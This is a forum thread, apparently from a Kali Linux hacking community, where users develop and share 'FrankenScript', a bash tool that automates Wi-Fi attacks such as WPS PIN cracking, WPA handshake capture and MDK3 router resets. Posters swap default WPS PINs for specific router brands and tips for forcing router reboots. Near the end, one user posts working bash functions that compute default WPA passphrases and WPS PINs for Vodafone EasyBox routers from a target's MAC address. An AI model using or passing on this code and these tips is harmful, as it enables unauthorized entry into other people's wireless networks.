FrankenScript no longer attacks capture files, but it can capture them.

FrankenScript no longer contains the commands to reset access points.

NOTE:
Notes:
This version doesn't have the WEP attacks setup yet, sorry.
I've added automated attack options.
Internet can be used while performing network attacks, Internet access would only be available during the automated attacks only.
FrankenScript works with aircrack-RC3.

FrankenScript For Kali-2.0 (Test Version) Updated 26/11/2015

Download Link:
http://multimirrorupload.com/iopj1184hfee/FS_Kali20.tar.gz

Please leave feedback.

================================================
This download is for Kali-1.X.X

FrankenScript_Portable.3rd.May.2015.tar.gz:
http://www12.zippyshare.com/v/0tnn263D/file.html
================================================

Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?

Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?

Yeah sure mate, its mean't for sharing.
Glad you like it, its a bit of an ego boost for me as it was my first ever script.
I really didn't know a single thing about scripting and such, I had to trawl the internet and learn everything as I went. LOL
I shouldn't have really posted it yet as its not finished, I still need to tweak a few things, eg: auto ENTER on some of the options, and I want to change some bash commands.

I'm doing a BTHub3 wordlist at the moment (making slow progress with perl though), so sometime in the future I might upload it or even add it to FrankenScript.

Yeah. I have couple suggestions.

1- Just an issue I found, when I go to enter "Attack Mode", I notice that it closes all processes that may cause a problem, but after that, my card no longer picks up networks. However, if I put into monitor mode manually and don't kill the processes, I have no problems.

2- When using MDK3 to reboot the router, check security type of target network and check for clients. If the target supports WPA-TKIP and has active clients, add -j to mdk3 mon0 m. It should reduce reboot times.

3- Make airodump stop and restart when using mdk3 to reboot the router. As more and more clients are connected with mdk3 mon0 a, airodump has to remember every single one, which causes it to slow down and freeze.

Looks good other than those few things though and great share!

Im really not sure about that issue as I've not encounted it myself, the only processes that are killed are:
NetworkManager
wpa_supplicant
The only other thing in the attack mode section is macchanging.

I don't have that issue and I can't get access to another machine for a while so I can't really look into it to well, hopefully someone else might be able enlighten us.

Cheers for the suggestions.
I haven't looked into mdk3 properly yet, will have to try the attacks myself and see how I can impliment them into the script (More headache!! LOL).

Oh I just had a thought, maybe the timing might be out, you could try making the sleep time longer.

Ok. I'll try it again tomorrow and see what happens!

If anyone knows of any other WPS default pin generaters please could you post them for me.
Many thanks.

Just using you're script now and it is very impressive.

Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement ;) )

The other thing, I wasn't aware that it must be run from root - this had me baffled untill I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

A netgear WPS pin generator would be nice - all I know is that they invariable start with a 2 but hey what do i know.

Rab.

If anyone knows of any other WPS default pin generaters please could you post them for me.
Many thanks.

I noticed with my wps pin script your only using the last 6 characters in the mac address sometimes you need to use the first 6 instead.

Just using you're script now and it is very impressive.

Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement ;) )

The other thing, I wasn't aware that it must be run from root - this had me baffled untill I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

A netgear WPS pin generator would be nice - all I know is that they invariable start with a 2 but hey what do i know.

Rab.

Many thanks for the feedback.
It did originally have the folder you're talking about, but I removed it while cleaning and adding to the script, I'll end up putting it back at some point.

What do you mean by wash and -C switch?.

I noticed with my wps pin script your only using the last 6 characters in the mac address sometimes you need to use the first 6 instead.

Oh blimey I didn't know that, cheers matey.
Sorry mate I didn't know who wrote the script, hope you don't mind that I added it to FrankenScript?.
I'll add credits to the script at some point, would you mind if I included you and your pin generater?.

What do you mean by wash and -C switch?.

-C, --ignore-fcs Ignore frame checksum errors......

If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

Rab.

Forgot - It is in the wash help

I dont mind if i did wouldn't try and help lol

-C, --ignore-fcs Ignore frame checksum errors......

If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

Rab.

Forgot - It is in the wash help

Kool, I'll add it to the script so others with the same issue can benefit.

Wow what nice this FrankSteroids bombed script, wanna try this with my new 2W adapter that is coming ;)

I've updated FrankenScript and posted the download link on the first page.

We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to and install an\ download.exe file on to your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs they were all over the place to include showing up in notepad. And we never actually got to your program.
We are not happy campers.

Musket Teams Alpha and Bravo

We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to and install an\ download.exe file on to your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs they were all over the place to include showing up in notepad. And we never actually got to your program.
We are not happy campers.

Musket Teams Alpha and Bravo

Cheers for the heads up mate.
I've checked it out and the downloads are fine, maybe you clicked on the silly ads that they use, avoid the ads and all should be good.

Your reply is kinda strange to me, you're the only person that has mentioned such issue, and what you said just doesn't add up.
I made a post at 02:46 AM saying that I had updated FrankenScript, you replied at 03:13 AM saying that you spent the last half an hour removing viruses.
So you're saying you spent 30mins removing viruses, plus the time it takes to browse to the mirror site and browse and try ALL the mirrors all within 27 minutes. LOL

Update:
I've added several direct links.

Again for clarity this is what we get - !!!Downloaders beware!!!

We are using XP for the download

For example:
We went to: http://rghost.net/51637035

There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

We have already seen this on the original download link and do not wish to do through that again. ie the same csize file just a more embedded name. Here the stick the actual file name at the beginning but give you an exe file instead.

We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

Musket Team A/B

Okay further to our above comments.

Our lab has six computers. We tried two other computers running XP and in every case clicking on the file gave us an exe file. The name of the file changed with the site but in every case it was a small exe. You do not want to run this - see our original above. Next we thought to try the download with kali-linux


Using kali-linuix we downloaded the correct file named FrankenScript-v2.tar.gz.

So for most of these links shown for this file we suggest users not use XP for the download - you will end up with a load of spyware and bogus products.


MTA/MTB

Again for clarity this is what we get - !!!Downloaders beware!!!

We are using XP for the download

For example:
We went to: http://rghost.net/51637035

There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

We have already seen this on the original download link and do not wish to do through that again. ie the same csize file just a more embedded name. Here the stick the actual file name at the beginning but give you an exe file instead.

We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

Musket Team A/B

We figured out what was going on. We have six computers in out lab. After trying two XP downloads we tried it with kali-linux and got the correctfile

We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name.. Look to see if it is an .exe file. Do not run this file.

Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.

For example you might load a file called ABCDEF.tar.gz. When you get the yellow rectangle asking to run or save, the file name will say ABCDEF.tar.gz. BUT when you get the file saved you will get something like ABCDEF.tar.gz.exe If you run this your antivirus will go nuts AND you will get a ton of useless files asking to check your computer or provide some sort of service. We tested this exe file with a persistent usb version of XP that we were going to trash. We even had icons showing up in notepad.

However if you download the file with kali-linux you get what you asked for, and are not sent to viral land of spyware and products no one wants or will ever need.

We have no knowledge about Windows 7 but we suspect the result would mimic XP

http://mir.cr/
http://www21.zippyshare.com/
http://rghost.net/
http://www.sendmyway.com/
http://fichier.com/
http://180upload.com/

We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name.. Look to see if it is an .exe file. Do not run this file.

Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.


With all due respect this is a well KNOWN or should be FACT.
Most websites now are cluttered with download buttons which are not associated with the actual file (not all downloads are malware but are equally annoying and the unitiated do get caught(Once bitten Twice Shy or should be) I still get caught sometimes and I have been using the net since 95.

One possibility, as they are hosting the file, is they are paid in some way for each alternative download while some will merely produce a popup with advertising.

The moral of this is "Buyer/downloader beware(Unsure? Don't Download unless you know how to clean your machine if you make an error)

Rab.

I've just checked : http://rghost.net/51637035 and don't see a single thing wrong.
I used the direct link and didn't see a single advert or any dodgey download buttons or the other clickable buttons like you mention.

Please stop trying to make it sound like my downloads are dodgey, there's nothing wrong with them.
Stop clicking other links and you wont have any issues, why you would click on any other links beats the **** out of me. LOL

I'm sure other members and the mods can comfirm that my downloads are NOT dodgey.

Please stop trying to make it sound like my downloads are dodgey, there's nothing wrong with them, I can't be responsible for people that don't know how the internet works.

That was not my intention - Only explaining the intricisies of downloading from certain hosting sites.
Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

Rab.

Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup- requesting you download ilivid, most inexperienced users would get caught with this. -Site Dependant?

That was not my intention - Only explaining the intricisies of downloading from certain hosting sites.
Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

Rab.

Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup- requesting you download ilivid, most inexperienced users would get caught with this. -Site Dependant?
Sorry mare, It wasn't aimed at you mate, it was aimed at musket.
Sorry if it came across wrong.

Not sure why he/she would say such things, not sure what the person has against me as I've done nothing to the person. :-(

Musket Teams wish to state there is nothing wrong with the Frankenscript program.

If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the d
ownload process and only shows up in the folder you save it to. This leads to viralville.

If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.

windows 8.1 it's all fine downloading, plz stop the **** hurt ;)

Musket Teams wish to state there is nothing wrong with the Frankenscript program.

If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the d
ownload process and only shows up in the folder you save it to. This leads to viralville.

If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.

Yeah but you posted their after you posted here saying that you posted it there too (Check the time stamp). LOL
I'm kool now musket has made things more clear. :-)
Hope there's no bad feelings.

I've already downloaded your script but haven't had chance to try it yet, I'll test it later, cheers for the heads up though.

Very nice job indeed
Some part of the code are very, very familiar to me. ;)

Very nice job indeed
Some part of the code are very, very familiar to me. ;)

What part?, let me guess, its either the vodafone or the WPSPIN, am I correct?.
Please let me know and I'll add credits for you or remove it , which ever you choose I'm kool.

It is WPSPIN you are correct ;)
Please, do not worry and do not delete anything, you are welcome to use the code.
I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
Actually you gave me credit ;)

And a big thanks to the creators of the other two wps default pin generaters.

I sincerely appreciate

For information,
- The person that revealed the algorithm of easybox arcadyan Vodafone is Stefan Viehböck Vodafone EasyBox Default WPS PIN Algorithm Weakness (https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v 10.txt)
- And one of the algorithm used in WPSPIN ( the one that is mostly used among manufacturer which is a conversion form hexadecimal to decimal of half end bssid ) was previously discovered by zhao chunsheng in a script called computepinC83A35 for Tenda router (with beginning bssid C8:3A:35:XX:XX:XX) published in something like may 2012
I thought i found it in something like ocotber-novmebr 2012 but i realized that it was found long before as you can see in the homepage of the script : http://gjkiss.info/2012/04/get-the-pin-in-router-mac-address-start-with-c83a35-00b00c-081075
It is the one that is used in the python script included in your script, WPSpin.py.
The one that i found out is for HUAWEI HG532c and uses part of the essid and some addition before conversion to decimal and is integrated in the function that attribute PIN that you use in your script.

Keep on the good job and fell free to use WPSPIN, that is what GPL v 3. is for.

Cheers :)

It is WPSPIN you are correct ;)
Please, do not worry and do not delete anything, you are welcome to use the code.
I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
Actually you gave me credit ;)

lol if im not the first person to find this that i dont want any credit i do not deserve.

also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.

also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.

I do
That is a really interesting, thank you very much for sharing it. :)
Could you give us the exact model of the router?
I guess the WPS in enabled. Could you confirm it?
Is there any AP rate limit system?


lol if im not the first person to find this that i dont want any credit i do not deserve.


i guess no one here wants credits for things discovered by other people :)


Smile while you can for in the future there my be nothing to smile about

For sure! :D :D

Thank you , i hope be a nice tool :)

I do
That is a really interesting, thank you very much for sharing it. :)
Could you give us the exact model of the router?
I guess the WPS in enabled. Could you confirm it?
Is there any AP rate limit system?

I really dont know if there is limiting since its cracked on the first pin.
but the wps is actually forced enabled and locked on this one.
and here is a screen capture of the HW/FW Versions serial marked out because default password
192

I like the fact that you guys are modest, its a rare thing now days.
Believe me you all desevre credit regardless, I really appriciate your work and efforts, I couldn't have done what I did if it wasn't for you guys. :-)

Cheers again guys.

I found the pin of a Tenda router right now with WPSPIN & ur script

the other easybox script is for what routers??

Thanks.

Coooool :cool:
Thank you so much Shaberu !!!! ;)



the other easybox script is for what routers??

The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system (http://www.patentgenius.com/patent/7894379.html)
And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
For the PIN, which is a variation on the pattern patented, it has been reported on german easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v 10.txt
It has been also reported later to be in used in spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code where corrected by Coeman76 ( some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on spanish Vodafone acess point which may not be correct on other ones) and he unified the two algorithm ( default WPA and default PIN ) in one tool.

The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system (http://www.patentgenius.com/patent/7894379.html)
And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
For the PIN, which is a variation on the pattern patented, it has been reported on german easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v 10.txt
It has been also reported later to be in used in spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code where corrected by Coeman76 ( some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on spanish Vodafone acess point which may not be correct on other ones) and he unified the two algorithm ( default WPA and default PIN ) in one tool.

So has easy_box been fully implimented into WPSPIN?, If it has I'll remove easy_box from FrankenScript.

'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(i pressed enter)

Please choose an AP
(nothing but blank space)


Please input the number of your chosen target:'

Where is the choices of an AP suppose to appear?

The script has to be run from root

copy the script into the root folder and run i from there - it should work....

Rab.

'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(i pressed enter)

Please choose an AP
(nothing but blank space)


Please input the number of your chosen target:'

Where is the choices of an AP suppose to appear?

The choices should appear just above "Please input the number of your chosen target".
Try what flyinghaggis suggested, if that doesn't work look in the FrankenScript temp folder and delete anything that might be in there.
Did wash display any access points?.
Did you select you WiFi device?.
Did you enable attack mode?.
Did you recieve any error messages?.

Update:
FrankenScript-v3 has been added to the first page.

slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

http://www63.zippyshare.com/d/67860325/7965/FrankenScript-v3.tar.gz

http://www63.zippyshare.com/d/67860325/7965/FrankenScript-v3.tar.gz

This one is downloaded by clicking on the bright orange button at the top right if you hover over it
you will see in the botton left of your screen a description of the file you are downloading.

I downloaded this from a Kali guest in VMWare using iceweasel.

The other buttons are misleading Yes but that's the nature of the game.

Other browsers may display the download differently but I doubt it (Just hover over it to check the description).

Rab.

slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

Theres not much I can do about the ads, they're generated by the hosting sites and NOT me.
Honestly mate its really not that hard, you just need to read things rather than quickly rush through them.
I've added a brief how to download guide to the first page.

If anyone has any suggestions on how I can provide the file without using hosting sites that supports ads please let me know.

Theres not much I can do about the ads, they're generated by the hosting sites and NOT me.
Honestly mate its really not that hard, you just need to read things rather than quickly rush through them.
I've added a brief how to download guide to the first page.

If anyone has any suggestions on how I can provide the file without using hosting sites that supports ads please let me know.
hi :) slim76
thanks fo share your works!!! great
i'm not expert ...but...you can try dropbox
bye && thanks again
:D

I am having problems with the new version of the script
after selecting option 3 from the menu I press enter - the wash screen pops up for a split second and then closes
with nothing to select on the main page.

I have re-run version 2 from the exact same location (root) and that runs as it should.

Any ideas.

Rab.

I think I may have found the problem

It may be due to the kill process, if I don't run it from your script it runs fine but it I do run it I get nothing.
After running it with the kill process I did an iwconfig after closing the programme and this is the output....
Interface Chipset Driver

wlan0 Realtek RTL8187L rtl8187 - [phy3]SIOCSIFFLAGS: Operation not possible due to RF-kill

(monitor mode enabled on mon0)

But I was still unable to run any operations using my adapter untill reboot.
A small bug perhaps.

Rab

Slim... We all know it not you... Breathe! LoL
Upload to 0bin.net (thats a zero and then bin.net) great for all kinds of uses as its an encrypted pastebin
Or use Dropbox if you want.

You assembled a great script and we all want to access it.

@ zimmaro

Cheers for the suggestion mate, will look into it.

@ brazen

Cheers for the suggestion, will look into it too.
Sorry it sounde like I was moaning/bitching at you, I wasn't, It's just how I talk/type. LOL

@ flyinghaggis

I'll run through the obvious first:
1) Did you select you WiFi device?.
2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?.
3) Did you enable attack mode?.
4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?.
5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?.
6) Is the temp folder in the FrankenScript directory empty?.

Other possible causes could be:
Sleep timing might need to be increased.
Its possible that you might have double tapped the keyboard button, or held it down too long.

If more people report issues I'll have to think about changeing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.

FrankenScript-v3.1
UPDATED: 1/18/2014

MDK3 - access point reset files are now deleted.
Changed and added sleep timing.
Changed WiFi device detection again.

PasteBin:
http://goo.gl/PzaT5t

So has easy_box been fully implimented into WPSPIN?, If it has I'll remove easy_box from FrankenScript.

No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

cheers and may the force be with you and frankenscript.sh. ;)

No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

cheers and may the force be with you and frankenscript.sh. ;)

LOL, cheers dude.

I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

NOTE:
If anyone knows of any other WPS default pin generaters please could you post them for me.
Many thanks.

http://packetstormsecurity.com/files/123631/ARRIS-DG860A-WPS-PIN-Generator.html

http://packetstormsecurity.com/files/123631/ARRIS-DG860A-WPS-PIN-Generator.html

Cheers matey, most greatful. :-)

Do you know how to use it, does it use the standard mac of the AP (Openly broadcast)?, or does it use some other mac (Not broadcast)?.
Cheers mate.

We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count

We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count

Sorry to hear you're having trouble with it, did you change anything it the script?, or maybe you got some sort of corruption while downloading or copy and pasting.

I'll be updating it again soon, I've made a few changes and added some new things.

Cheers matey, most greatful. :-)

Do you know how to use it, does it use the standard mac of the AP (Openly broadcast)?, or does it use some other mac (Not broadcast)?.
Cheers mate.

sorry i have no idea :p just found it while searching around.
I also finally got around to test your version 1.3 of frankenscript i really like it cracked a wps enabled router but i do have one problem 201 when scanning for networks to collect a handshake your script dosent display the full name of the router. as you can see from my screenshot this could be a problem the suddenlink routers have some code that follows its name.

sorry i have no idea :p just found it while searching around.
I also finally got around to test your version 1.3 of frankenscript i really like it cracked a wps enabled router but i do have one problem 201 when scanning for networks to collect a handshake your script dosent display the full name of the router. as you can see from my screenshot this could be a problem the suddenlink routers have some code that follows its name.

Sorry matey, I'll look into it and see if I can fix it for the next update.
Does it contain any symbols or does it just consist of characters and digits?, Can you post an example ( Full broadcast essid ) please.

Try this:

Look in FrankenScript for the following lines:
----------------------------------------------------------------------
###### [4] Capture WPA/WPA2 Handshake ######
4)
cd $HOME/FrankenScript/temp
clear
echo $RED"Scan for possible targets."
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
read -p $GREEN"Press [Enter] to start the scan.$STAND"

xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
sleep 1

PresentedAPs=$(cat PresentedAPs.txt)

Change this line:
---------------------------
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt

Replace it with this line:
--------------------------------------
cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt

I tried your fix i didn't help but here is a screen shot of the networks 202

I tried your fix i didn't help but here is a screen shot of the networks 202

I can't see any reason why its doing what you say.
The only thing I can think of is that the broadcast essid might have spaces in its name, I used the awk command to print columns so anything with a space would be a different column and wouldn't be printed on the screen.

They don't have any spaces i believe its caused by the period in there names because that's where it cuts off at

They don't have any spaces i believe its caused by the period in there names because that's where it cuts off at

Its strange cause you've tried two different commands.
One command grepped for the last column, the other command deleted everything upto the begining of the essid (so the essid and everything after should have been printed).
I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(

LOL, cheers dude.

I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan

I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )


ARCADYAN(){
# WPSPIN 1.5 - GPL v 3 by kcdtv
# This function uses three amazing works
# 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
# 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
# 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
#
# Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code
# This function is based on the script easybox_keygen.sh previously mentioned
# # The quotation from the original work start with double dash and are beetwen quotes
# Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA
# the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged"


# This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX)
# It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
# give the full WPS PIN ($PIN)

## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN
## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged
K1=$((($c1)%16)) ######unchanged
K2=$((($c2)%16)) ######unchanged
X1=$((K1^${deci[3]})) ######unchanged
X2=$((K1^${deci[2]})) ######unchanged
X3=$((K1^${deci[1]})) ######unchanged
Y1=$((K2^0x${hexi[1]})) ######unchanged
Y2=$((K2^0x${hexi[2]})) ######unchanged
Y3=$((K2^0x${hexi[3]})) ######unchanged
Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged
Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged
Z3=$((K1^K2)) ######unchanged
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit
DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
CHECKSUM
}



I put you back CHECKSUM in case it helps you


CHECKSUM(){ # The function checksum was written for bash by antares_145 form crack-wifi.com
PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0 # to get a result using this function)

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number

DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "

PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
} # STRING + CHECKSUM gives the full WPS PIN




feel free to use the code and if yiou have any question about it do not hesitate to ask


cheers :)

i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan

I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )

feel free to use the code and if yiou have any question about it do not hesitate to ask

cheers :)

Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please fee free to add any credits or such.



